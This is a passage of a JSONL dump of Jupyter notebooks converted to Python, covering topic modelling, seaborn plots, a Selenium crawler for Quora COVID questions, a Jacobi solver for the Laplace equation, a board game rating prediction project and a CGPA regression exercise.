+\nmodel = models.LdaModel.load('lda.model')\n\n# print all topics\nmodel.show_topics(num_topics=20)\n# -\n\n\n","repo_name":"tupiznak/made-project","sub_path":"backend/ml/analyze/LDA_abstact.ipynb","file_name":"LDA_abstact.ipynb","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"30471244822","text":"# +\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport requests\nimport io\nimport seaborn as sns\nfrom numpy import nan\n\nurl = 'https://raw.githubusercontent.com/colettegabriel/capstone_1/master/styles.csv'\ndata_file = requests.get(url).content\ndf = pd.read_csv(io.StringIO(data_file.decode('utf-8')))\ndf['reduction'] = np.where(df['price_disc'] < df['price_us'], df['price_us']-df['price_disc'], np.nan)\npd.options.mode.chained_assignment = None\n# -\n\ndf.head(10)\n\n\n# + active=\"\"\n#\n\n# +\ndef price_filter(df, category, cat_filter, price):\n price_filter = df.loc[df[category]== cat_filter][price]\n return price_filter\n\nx = price_filter(df,'masterCategory','Accessories','price_us')\ny = price_filter(df,'masterCategory','Apparel','price_us')\nz = price_filter(df,'masterCategory','Footwear','price_us')\n\n\nplt.figure(figsize=(20,5))\nbox_plot_data = [x,y,z]\nplt.boxplot(box_plot_data, patch_artist=True, vert=False, labels=['Accessories', 'Apparel', 'Footwear'])\n\n# +\nsns.set()\n\n#Multiple linear regression price over year\ng = sns.lmplot(x='year', y='price_us', hue='masterCategory',\n truncate=True, height=8, data=df)\n\n# Use more informative axis labels than are provided by default\ng.set_axis_labels(\"Regulary Price\", \"Year\")\nplt.title('Multiple Regression Lines: Price range by Category over time')\n\n\n# +\nsns.set(style=\"white\")\n\n# Plot price over year\nsns.relplot(x=\"year\", y=\"price_us\", hue=\"masterCategory\", size=\"masterCategory\",\n sizes=(40, 400), alpha=.5, palette=\"muted\",\n height=6, data=df)\n\n# +\nsns.set(style=\"whitegrid\")\n\ng = sns.factorplot(x=\"year\", y=\"price_us\", 
hue=\"masterCategory\", data=df,\n height=6, kind=\"point\", palette=\"pastel\",ci=95,dodge=True,join=False)\ng.despine(left=True)\ng.set_ylabels(\"Price\")\ng.set_xlabels(\"\")\nplt.title('Pointplot: Price range by Category over time')\nplt.show()\n\n# +\nsns.set(style=\"white\")\n\ng = sns.lmplot(y='price_us', \n x='year',\n hue='gender',\n data=df, # Data.\n col='masterCategory',\n fit_reg=False,\n ci=False,\n scatter_kws={'alpha':0.4})\ng.set_ylabels(\"Reg Price\")\ng.set_xlabels(\"Year\")\nplt.suptitle('Scatterplot: Regular price over time by Gender')\nplt.subplots_adjust(top=0.9)\nplt.show()\n\n# -\n\nsns.distplot(df['price_us']);\nplt.suptitle('Histogram with KDE: Regular Price')\n\n# +\nsns.set(style=\"white\")\n\ng = sns.jointplot(x=\"price_disc\", y=\"price_us\", data=df)\nplt.show()\n# -\n\n\n","repo_name":"colettegabriel/data_science","sub_path":"Seaborn practice.ipynb","file_name":"Seaborn practice.ipynb","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"23995363188","text":"import time\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n# +\nqueries = [\"covid\", \"coronavirus\"]\nlinks = []\nfor query in queries:\n url = f\"https://www.quora.com/search?q={query}\"\n\n browser = webdriver.Chrome()\n browser.get(url)\n elem = browser.find_element_by_tag_name(\"body\")\n \n for _ in range(100):\n elem.send_keys(Keys.PAGE_DOWN)\n time.sleep(0.2)\n\n for entry in browser.find_elements_by_xpath(\"//a[@class='question_link']\"):\n link = entry.get_attribute(\"href\")\n links.append(link)\n\n browser.close()\n\nwith open(\"quora.links\", \"w\") as fp:\n for link in links:\n fp.write(link)\n fp.write(\"\\n\")\n\n# +\nxpath = r'//*[@id=\"root\"]/div/div/div[3]/div/div/div[1]/div[1]/div/div[2]/span/div/div/div/span/span'\nquestions = []\n\nfor link in links:\n browser = webdriver.Chrome()\n browser.get(link)\n try:\n questions.append(browser.find_element_by_xpath(xpath).text)\n except:\n pass\n browser.close()\n time.sleep(0.5)\n# -\n\nwith open(\"quora.questions\", \"w\") as fp:\n for question in questions:\n fp.write(question)\n fp.write(\"\\n\")\n\n\n","repo_name":"mllejuly/Covid19-Chatbot","sub_path":"crawler/quora_question_crawler.ipynb","file_name":"quora_question_crawler.ipynb","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"33308570632","text":"# # Import\n\nimport numpy as np\nimport matplotlib.pyplot as plot\nimport time as time\n\n# # Paramètres\n\n# +\nksch = 2 # Choix du schema 1 5pts, 2 9pts\nN = 33 # Taille du maillage\n\nh = 1. 
/ (N - 1) # Pas d'espace\nnitermax = 10000 # nombre maxi d'iteration de jacobi\nrestab = np.zeros(nitermax)\nerrtab = np.zeros(nitermax)\n\npi = np.pi\n# -\n\n# # Generation du maillage\n\nx = np.linspace(0, 1, N)\ny = np.linspace(0, 1, N)\n\n# # La solution exacte\n\nTe = np.zeros([N, N])\nfor i in range(0, N):\n for j in range(0, N):\n Te[i, j] = (1 / np.sinh(np.pi)) * (\n np.sinh(np.pi * x[i]) * np.sin(np.pi * y[j]) + np.sin(np.pi * x[i]) * np.sinh(np.pi * y[j]))\n\n# # Conditions aux limites\n\nT = np.zeros([N, N])\n# (valeurs imposees en debut de calcul)\nT[0, :] = 0.\nT[:, 0] = 0.\nfor i in range(0, N):\n T[N-1, i] = np.sin(pi*y[i])\n T[i, N-1] = np.sin(pi*x[i])\n\n# # Itérations de Jacobi\n\n# +\ndebtime = time.time() # temps de l'horloge au début du calcul, pour mesure du temps d'exécution\nniter = 0 # compteur nombre d'iterations\nres = 1. # residu\n\nwhile res > 1.0E-16 and niter < nitermax : # on continu les iterations tant que le residu est trop grand\n # stockage du du niveau N+1 au niveau N\n U = np.copy(T) # multiplication par \"1\" pour forcer une copie, sinon U et T deviendraient synonymes\n if ksch == 1:\n # methode de jacobi a 5 Pts\n for i in range(1, N-1):\n for j in range(1, N-1):\n T[i, j] = 0.25*(U[i+1, j] + U[i-1, j] + U[i, j+1] + U[i, j-1])\n\n if ksch == 2:\n # methode de jacobi a 9 pts\n for i in range(1, N - 1):\n for j in range(1, N - 1):\n # a modifier pour passer à 9 pts\n T[i, j] = 0.2*(U[i + 1, j] + U[i - 1, j] + U[i, j + 1] + U[i, j - 1]) + 0.05*(U[i + 1, j+1] + U[i - 1, j+1] + U[i+1, j - 1] + U[i-1, j - 1])\n\n # Calcul du residu en norme L2 - écart entre deux solutions successives\n res = np.linalg.norm(T-U)/N\n restab[niter-1] = np.log10(res)\n\n # calcul de l'erreur en norme L2 - écart vs. solution exacte\n erreur = np.linalg.norm(T-Te)/N\n errtab[niter - 1] = np.log10(erreur)\n \n niter = niter+1\n\n\nfintime = time.time() # temps de l'horloge en fin de calcul\n\nprint(\"nombre d'iterations\", niter)\nprint(\"temps cpu\", fintime-debtime)\nprint(\"log10 de l'erreur\", np.log10(erreur))\nprint(\"log10 du pas\", np.log10(h))\n# -\n\n# # Graphiques\n\n# ## Erreur\n\n# +\nnumiter = range(niter-1)\n\nfig = plot.figure()\nplot.plot(numiter, errtab[0:niter-1], 'r', label=\"erreur\")\nplot.plot(numiter, restab[0:niter-1], 'b-', label=\"residu\")\nplot.title(\"erreur en rouge et residu en bleu a chaque iteration\")\nplot.xlabel('iterations')\nplot.ylabel('log 10 de l erreur')\nplot.legend()\nplot.grid()\n# -\n\n# ## Graphique contours en 2D\n\nfig = plot.figure()\nX, Y = np.meshgrid(x, y)\nplot.contourf(X, Y, Te, 50)\nplot.colorbar()\nplot.title('Solution exacte')\nplot.xlabel('x')\nplot.ylabel('y')\nplot.grid()\n#fig.show()\nplot.savefig('myfig.png', dpi=300)\n\nfig = plot.figure()\nX, Y = np.meshgrid(x, y)\nplot.contourf(X, Y, T- Te, 50)\nplot.colorbar()\nplot.title(' eccart entre la temperature exacte et celle approchee')\nplot.xlabel('x')\nplot.ylabel('y')\nplot.grid()\n#fig.show()\nplot.savefig('myfig.png', dpi=300)\n\n# ## Graphique en 3D\n\n# +\nfrom matplotlib import cm\n\nfig3d = plot.figure()\n\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\nax = Axes3D(fig3d) # erreur avec python 2.7\nax.plot_surface(X, Y, T, rstride=1, cstride=1, cmap=cm.winter)\nplot.title(' temperature dans la plaque')\nplot.xlabel('x')\nplot.ylabel('y')\n\nplot.show()\n# -\n\n# # Ordre de schema\n\nfrom scipy import stats\n\nvector_h = [1./8., 1./16., 1./24., 1./32.]\nvector_log10error_5points = [-2.432586973010995, -3.005489848760658, -3.3491292998568243, 
-3.5966857327717956]\nvector_log10error_9points = [-6.7530342106755405, -8.534142839057125, -9.582087449052079, -10.327453618158863]\n\n# +\nresult_lin_fit_5points = stats.linregress(np.log10(vector_h), vector_log10error_5points)\n\nprint('slope = ', result_lin_fit_5points[0])\nprint('intercept = ', result_lin_fit_5points[1])\n\n# +\nresult_lin_fit_9points = stats.linregress(np.log10(vector_h), vector_log10error_9points)\n\nprint('slope = ', result_lin_fit_9points[0])\nprint('intercept = ', result_lin_fit_9points[1])\n# -\n\nfig, ax = plot.subplots(nrows=1, ncols=1, figsize=(5,4))\nax.plot(np.log10(vector_h), vector_log10error_5points, 'o', color='blue', label='5 points')\nax.plot(np.log10(vector_h), vector_log10error_9points, 'o', color='red', label='9 points')\nax.plot(np.log10(vector_h), result_lin_fit_5points[1] + result_lin_fit_5points[0]*np.log10(vector_h), '--', color='blue')\nax.plot(np.log10(vector_h), result_lin_fit_9points[1] + result_lin_fit_9points[0]*np.log10(vector_h), '--', color='red')\nax.set(xlabel=r'$log_{10} h$', ylabel='Erreur'); ax.grid()\nax.legend()\nplot.show()\n\n\n","repo_name":"anastasiaGor/turbulence_data_notebooks","sub_path":"BE_outils_numeriques/BE6.ipynb","file_name":"BE6.ipynb","file_ext":"py","file_size_in_byte":4828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"43015384517","text":"# # Guided Project: Predicting Board Game Reviews\n# ### Apply clustering and regression techniques to predict board game review scores.\n#\n# ##### Contents:\n# - KMeans\n# - set()\n# - list.remove()\n# - df.apply(np.mean, axis=1)\n# - df.corr()\n# - sklearn.linear_model.LinearRegression\n# - Other\n# - SVR\n# - RandomForestRegressor\n#\n# ## 1: Board Game Reviews\n# Board games have been making a comeback lately, and deeper, more strategic boardgames, like [Settlers of Catan](https://en.wikipedia.org/wiki/Catan) have become hugely popular. A popular site where these types of board games are discussed and reviewed is [BoardGameGeek](http://www.boardgamegeek.com/).\n#\n# In this project, you'll be working with a data set that contains `80000` board games and their associated review scores. The data was scraped from BoardGameGeek and compiled into CSV format by [Sean Beck](https://github.com/ThaWeatherman). The data set is stored in `board_games.csv`, and can be downloaded [here](https://github.com/ThaWeatherman/scrapers/blob/master/boardgamegeek/games.csv). If you need help at any point, you can consult our solution notebook [here](https://github.com/dataquestio/solutions/blob/master/Mission211Solution.ipynb).\n#\n# Here's a preview of the first 5 rows and columns:\n#\n# | id | type | name | yearpublished | minplayers |\n# |--------|-----------|-------------------------------------------|---------------|------------|\n# | 12333 | boardgame | Twilight Struggle | 2005 | 2 |\n# | 120677 | boardgame | Terra Mystica | 2012 | 2 |\n# | 102794 | boardgame | Caverna: The Cave Farmers | 2013 | 1 |\n# | 25613 | boardgame | Through the Ages: A Story of Civilization | 2006 | 2 |\n# | 3076 | boardgame | Puerto Rico | 2002 | 2 |\n#\n# Each row represents a single board game, and has descriptive statistics about the board game, as well as review information. 
Here are some of the interesting columns:\n#\n# - `name`: name of the board game.\n# - `playingtime`: the playing time (given by the manufacturer).\n# - `minplaytime`: the minimum playing time (given by the manufacturer).\n# - `maxplaytime`: the maximum playing time (given by the manufacturer).\n# - `minage`: the minimum recommended age to play.\n# - `users_rated`: the number of users who rated the game.\n# - `average_rating`: the average rating given to the game by users. (0-10)\n# - `total_weights`: Number of weights given by users. Read more about what BoardGameGeek considers weights [here](http://boardgamegeek.com/wiki/page/Weight).\n# - `average_weight`: the average of all the subjective weights (0-5).\n#\n# One interesting machine learning task might be to predict `average_rating` using the other columns. The data set contains quite a few missing values, and rows where there are no reviews. You'll need to remove these as you explore the data to make prediction easier.\n#\n# #### Instructions:\n#\n# - `Read board_games.csv` into a Dataframe called `board_games` using the pandas library.\n# - Display the first few rows of `board_games` and get familiar with the data set.\n# - Use the [DataFrame.dropna()](http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.dropna.html) method to remove rows containing missing values.\n# - Remove any rows that have no reviews.\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# %matplotlib inline\nimport seaborn as sns\n\nboard_games = pd.read_csv('data/board_games.csv')\nboard_games.head(3)\n\nboard_games.describe()\n\nboard_games.dropna(inplace=True)\nboard_games = board_games[board_games['users_rated'] > 0]\n\n# ## 2: Picking An Error Metric\n#\n# You want to predict the average_rating column using the other columns, but you'll need to do some data exploration before you're ready to do so. The exploration will help you understand the distribution of average_rating better, as well as select an error metric that you'll use to evaluate the performance of your machine learning model.\n#\n# #### Instructions:\n# - Become familiar with the distribution of average ratings by generating plots and calculating summary statistics. For each of the following, write down your observations in a Markdown cell.\n# - Generate a histogram of the average ratings.\n# - Generate a box and whisker plot of the average ratings.\n# - Calculate the standard deviation.\n# - Calculating the mean.\n# - Think about what error metric might make sense for this data, and write a markdown cell with your thoughts.\n\nplt.hist(board_games.average_rating)\nplt.show()\n\nplt.boxplot(board_games.average_rating)\nplt.show()\n\n# +\navg_rating_std = board_games.average_rating.std()\navg_rating_mean = board_games.average_rating.mean()\n\nprint(avg_rating_std, avg_rating_mean)\n# -\n\n# The `average_rating` data is continuous, so MSE could be a good metric since it penalizes larger errors.\n\n# ## 3: Plotting Clusters\n#\n# Now that you have a handle on the `average_rating` column, and have picked an error metric, you're ready for the next step. If you haven't picked an error metric, you should look at Mean Squared Error. As the data is continuous, and you want to penalize larger errors more, Mean Squared Error is a good error metric choice.\n#\n# You can look at the data for patterns that may help you develop a machine learning model. 
One way to look for patterns is to use a clustering algorithm to create clusters, then plot them out.\n#\n# You can first use the [sklearn.cluster.KMeans](http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html) class to fit a k-means clustering model. This class only works with numeric columns, so you have to extract the numeric columns of `board_games` before passing them into the [KMeans.fit()](http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html#sklearn.cluster.KMeans.fit) method.\n#\n# To visualize how board games are clustered, we can calculate the row means and row standard deviations and then generate a scatter plot that compares the means against the standard deviations. We encourage you to think of other ways to visualize the rows as clusters as well.\n#\n# #### Instructions:\n#\n# - Use the KMeans class to create clusters.\n# - Initialize the KMeans class with 5 clusters.\n# - Extract the numeric columns of board_games, and assign to the variable numeric_columns.\n# - Leave out name, type, and id.\n# - Fit the KMeans class to numeric_columns using the fit method.\n# - Extract the labels_ attribute of the KMeans class, and assign to the variable labels.\n# - Plot out the cluster assignments.\n# - Use the apply method on numeric_columns with the keyword argument axis set to 1 to find the mean of each row. Assign the result to game_mean.\n# - Use the apply method on numeric_columns with the keyword argument axis set to 1 to find the standard deviation of each row. Assign the result to game_std.\n# - Create a plot using the matplotlib scatter function, with the c keyword argument set to labels, the keyword argument x set to game_mean, and the keyword argument y set to game_std.\n# - What do the results tell you? Write up the results in a markdown cell.\n\n# +\nfrom sklearn.cluster import KMeans\n\nkmeans_model = KMeans(5)\n# -\n\nnumeric_columns = list(board_games._get_numeric_data().columns)\nnumeric_columns\n\nset(board_games.columns) - set(numeric_columns)\n\nnumeric_columns.remove('id')\nboard_games[numeric_columns]\n\nkmeans_model.fit(board_games[numeric_columns])\nlabels = kmeans_model.labels_\n\ngame_mean = board_games[numeric_columns].apply(np.mean,axis=1)\ngame_std = board_games[numeric_columns].apply(np.std, axis=1)\n\nplt.scatter(game_mean, game_std, c=labels)\n\n#\n\n# ## 4: Finding Correlations\n#\n# Now that you're done some data exploration, you can figure out which columns correlate well with `average_rating`. This will enable you to remove columns that don't add much predictive power to the model. For example, columns that are uncorrelated with the target won't help a linear regression model. It will also enable you to remove columns that are derived from the target, or otherwise cause overfitting.\n#\n# #### Instructions:\n#\n# - Use the [DataFrame.corr()](http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.corr.html) method to compute pairwise correlations between only the numeric columns. Assign the result to correlations.\n# - Display the average_rating column of correlations, which shows how much the other columns correlate with the average_rating column.\n# - Do any of the correlations surprise you? Write up your thoughts in a markdown cell.\n# - Remove any columns that seem to be derived from the average_rating. 
The bayes_average_rating is an example of this.\n# - Remove any columns that don't seem to correlate at all with the average_rating column.\n\ncorrelations = board_games[numeric_columns].corr()\ncorrelations.average_rating\n\n# The other ratings columns (users_rated, bayes_average_rating) obviously correlate with average_rating.\n\n# +\nexclude = ['users_rated', 'average_rating', 'bayes_average_rating', \n 'average_weight', 'minplayers', 'maxplayers', 'playingtime',\n 'minplaytime', 'maxplaytime']\nfeatures = list(set(numeric_columns) - set(exclude))\n\nfeatures\n# -\n\n# ## 5: Creating A Model\n#\n# Now that you're done exploring the data, you're ready to create a linear regression model and make predictions for newly created board games.\n#\n# Ordinarily, you'd want to split the data into training and testing sets, train the algorithm on the training set, and test its performance on the test set. In this case, because we haven't covered training and testing sets yet, you'll evaluate the performance of the model on the training set.\n#\n# You'll fit a linear regression model to board_games, using the columns you think should be predictors, and average_rating as the target. You'll then generate predictions using the same predictors you used in the fitting process.\n#\n# #### Instructions:\n#\n# - Initialize a [LinearRegression](http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LinearRegression.html) model, and assign it to the variable `reg`.\n# - Use the [LinearRegression.fit()](http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LinearRegression.html#sklearn.linear_model.LinearRegression.fit) method to set the predictor columns you want the model to use and set the target column to `average_rating`.\n# - Use the [LinearRegression.predict()](http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LinearRegression.html#sklearn.linear_model.LinearRegression.predict) method to make predictions using the columns of board_games that you think should be used as predictors.\n# - The predictors you pass into LinearRegression.predict() should be the same predictors you passed into [LinearRegression.fit](http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LinearRegression.html#sklearn.linear_model.LinearRegression.fit).\n# - Assign the result to `predictions`.\n# - Calculate the error metric that you chose earlier.\n# - Write up what the error value tells you in a markdown cell.\n\n# +\nfrom sklearn.linear_model import LinearRegression\n\nlr = LinearRegression()\nlr.fit(board_games[features], board_games.average_rating)\npredictions = lr.predict(board_games[features])\n\n# +\nfrom sklearn.metrics import mean_squared_error\n\nmse = mean_squared_error(board_games.average_rating, predictions)\nmse\n# -\n\n# Error rate 2.28 above the standard deviation 1.58 which indicates that model may not perform well. \n\n# ## 6: Next Steps\n#\n# That's it for the guided steps. We recommend downloading this notebook and building on it. 
Here are some potential next steps:\n#\n# - Split the data into training and testing sets, and calculate error on the testing set.\n# - Try algorithms other than linear regression.\n# - Calculate new predictors based off the existing columns, such as:\n# - Player range (maxplayers - minplayers)\n# - Playing time range (maxplaytime - minplaytime)\n# - Average number of ratings (total_owners / users_rated)\n# - Scrape the latest data from [BoardGameGeek](http://www.boardgamegeek.com/) to acquire more data.\n\n# +\nfrom sklearn.model_selection import KFold, cross_val_score\n\n#cv = KFold(n=len(board_games), n_folds=10, shuffle=True)\nscores = cross_val_score(lr, board_games[features], board_games.average_rating)#, cv=cv)\nprint(scores)\navg_score = np.mean(scores)\navg_score\n\n# +\nfrom sklearn.svm import SVR\nsvr = SVR(kernel='linear')\n\nscores = cross_val_score(estimator=svr, X=board_games[features], y=board_games.average_rating)\navg_svr_score = np.mean(scores)\navg_svr_score\n\n# +\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import Ridge\n\nX_train, X_test, y_train, y_test = train_test_split(board_games[features], y, test_size=0.2)\n\nmodel = Ridge()\nmodel.fit(X_train, y_train)\npredictions = model.predict(X_test)\n\nmean_squared_error(y_test, predictions) \n\n# +\nfrom sklearn.ensemble import RandomForestRegressor\n\nrfr = RandomForestRegressor()\n\nrfr.fit(X_train, y_train)\npredictions = rfr.predict(X_test)\nmean_squared_error(y_test, predictions) \n","repo_name":"austinmw/DataQuest","sub_path":"6_Machine_Learning/Machine_Learning_Fundamentals/.ipynb_checkpoints/OLD-Guided Project - Predicting Board Game Reviews - KMeans, LinReg-checkpoint.ipynb","file_name":"OLD-Guided Project - Predicting Board Game Reviews - KMeans, LinReg-checkpoint.ipynb","file_ext":"py","file_size_in_byte":13328,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"3532333773","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport warnings\nwarnings.filterwarnings('ignore')\n\ndf=pd.read_csv('https://raw.githubusercontent.com/dsrscientist/dataset4/main/Grades.csv')\ndf\n\ndf.head(40)\n\ndf.tail(30)\n\ndf.shape\n\ndf.columns\n\ndf.dtypes\n\ndf.isnull().sum()\n\ndf.info()\n\nsns.heatmap(df.isnull())\n\ndf.nunique().to_frame(\"No. of unique values\")\n\ndf.drop([\"Seat No.\"], axis=1, inplace=True)\ndf\n\nfor i in df.columns:\n print(df[i].value_counts())\n print(\"\\n\")\n\nfor i in df.columns:\n if df[i].dtypes==\"object\":\n df[i]=df[i].fillna(df[i].mode()[0])\n\ndf.isnull().sum()\n\ndf.head(50)\n\nsns.heatmap(df.isnull())\n\ndf.nunique().to_frame(\"No. of unique values\")\n\ndf[\"CGPA\"].value_counts()\n\ndf.describe()\n\n# we can not remove outliers and skewness from the data as all the columns are of categorical type.\n# Moreover its not possible to perform univariate and bivariate analysis\n\n# WE do not remove outliers from target variable i.e. 
CGPA as well\n\ndf.skew()\n\nfrom sklearn.preprocessing import OrdinalEncoder\nOE=OrdinalEncoder()\nfor i in df.columns:\n if df[i].dtypes==\"object\":\n df[i]=OE.fit_transform(df[i].values.reshape(-1,1))\n\ndf\n\ndf.info()\n\ndf.describe()\n\ncor=df.corr()\ncor\n\nplt.figure(figsize=(20,15))\nsns.heatmap(df.corr(), linewidths=0.1, fmt=\".1g\", linecolor=\"black\", annot=True, cmap=\"Blues_r\")\nplt.yticks(rotation=0);\nplt.show()\n\ncor[\"CGPA\"].sort_values(ascending=False)\n\nplt.figure(figsize=(22,7))\ndf.corr()[\"CGPA\"].sort_values(ascending=False).drop([\"CGPA\"]).plot(kind=\"bar\", color=\"m\")\nplt.xlabel(\"Feature\", fontsize=15);\nplt.ylabel(\"Target\", fontsize=15);\nplt.title(\"correlation between features and target using barplot\", fontsize=20)\nplt.show()\n\n# Separating features and labels\n\nx=df.drop(\"CGPA\", axis=1)\ny=df[\"CGPA\"]\n\n# standarization of dataset\n\nfrom sklearn.preprocessing import StandardScaler\nscaler=StandardScaler()\nx=pd.DataFrame(scaler.fit_transform(x), columns=x.columns)\nx\n\n# To remove the multicolinearity using variance inflation factor\n\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\nvif=pd.DataFrame()\nvif[\"VIF values\"]=[variance_inflation_factor(x.values, i) \n for i in range(len(x.columns))]\nvif[\"Features\"]=x.columns\nvif\n\n# No need to remove multicolinearity\n\ny.value_counts()\n\n# Model development and classification\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import r2_score\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.linear_model import LinearRegression\n\nmaxAccu=0\nmaxRS=0\nfor i in range(1,200):\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.20, random_state=i)\n lr=LinearRegression()\n lr.fit(x_train, y_train)\n pred=lr.predict(x_test)\n acc=r2_score(y_test, pred)\n if acc>maxAccu:\n maxAccu=acc\n maxRS=i\nprint(\"maximum r2 score is\", maxAccu, \"at random state\", maxRS)\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.30, random_state=maxRS)\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.neighbors import KNeighborsRegressor as KNN\nfrom sklearn.linear_model import Lasso, Ridge\n\nLR=LinearRegression()\nLR.fit(x_train, y_train)\npred_LR=LR.predict(x_test)\npred_train=LR.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_LR))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_LR))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_LR))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred_LR)))\n\nplt.figure(figsize=(10,7))\nplt.scatter(x=pred_LR,y=y_test, color=\"r\")\nplt.plot(pred_LR, pred_LR, color=\"b\")\nplt.xlabel(\"Actual\", fontsize=14)\nplt.ylabel(\"Predicted\", fontsize=14)\nplt.title(\"Linear Regression\", fontsize=18)\nplt.show()\n\nRFR=RandomForestRegressor()\nRFR.fit(x_train, y_train)\npred_RFR=RFR.predict(x_test)\npred_train=RFR.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_RFR))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_RFR))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_RFR))\nprint(\"Root Mean Squared 
Error:\", np.sqrt(mean_squared_error(y_test,pred_RFR)))\n\nknn=KNN()\nknn.fit(x_train, y_train)\npred_knn=knn.predict(x_test)\npred_train=knn.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_knn))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_knn))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_knn))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred_knn)))\n\nGBR=GradientBoostingRegressor()\nGBR.fit(x_train, y_train)\npred_GBR=GBR.predict(x_test)\npred_train=GBR.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_GBR))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_GBR))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_GBR))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred_GBR)))\n\nlasso=Lasso()\nlasso.fit(x_train, y_train)\npred_lasso=lasso.predict(x_test)\npred_train=lasso.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_lasso))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_lasso))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_lasso))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred_lasso)))\n\nrd=Ridge()\nrd.fit(x_train, y_train)\npred_rd=rd.predict(x_test)\npred_train=rd.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_rd))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_rd))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_rd))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred_rd)))\n\nfrom sklearn.tree import DecisionTreeRegressor\ndtr=DecisionTreeRegressor()\ndtr.fit(x_train, y_train)\npred_DTR=dtr.predict(x_test)\npred_train=dtr.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_DTR))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_DTR))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_DTR))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred_DTR)))\n\nfrom sklearn.svm import SVR\nsvr=SVR()\nsvr.fit(x_train, y_train)\npred_SVR=svr.predict(x_test)\npred_train=svr.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_SVR))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_SVR))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_SVR))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred_SVR)))\n\nfrom sklearn.ensemble import ExtraTreesRegressor\netr=ExtraTreesRegressor()\netr.fit(x_train, y_train)\npred_ETR=etr.predict(x_test)\npred_train=etr.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_SVR))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_ETR))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_ETR))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred_ETR)))\n\n# On the basis of R2 Score, ExtraTreesRegressor and SVR model are fitting best.\n\nfrom sklearn.model_selection import 
